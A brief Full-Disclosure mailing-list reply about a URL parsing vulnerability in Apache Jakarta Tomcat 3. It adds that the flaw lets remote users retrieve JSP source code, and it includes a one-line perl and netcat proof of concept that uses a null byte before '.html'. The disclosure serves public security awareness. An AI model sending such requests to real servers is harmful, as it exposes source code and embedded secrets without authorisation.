Re: Apache Jakarta Tomcat 3 URL parsing vulnerability

[Jouko Pynnonen <jouko () solutions fi>]

One more thing: the vulnerability also allows remote users to retrieve 
source of JSP files in this way:

$ perl -e 'print "GET /examples/jsp/cal/cal1.jsp\x00.html HTTP/1.0\r\n\r\n";'|nc my.server 8080


-- 
Jouko Pynnonen          Online Solutions Ltd       Secure your Linux -
jouko () solutions fi      http://www.solutions.fi    http://www.secmod.com

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html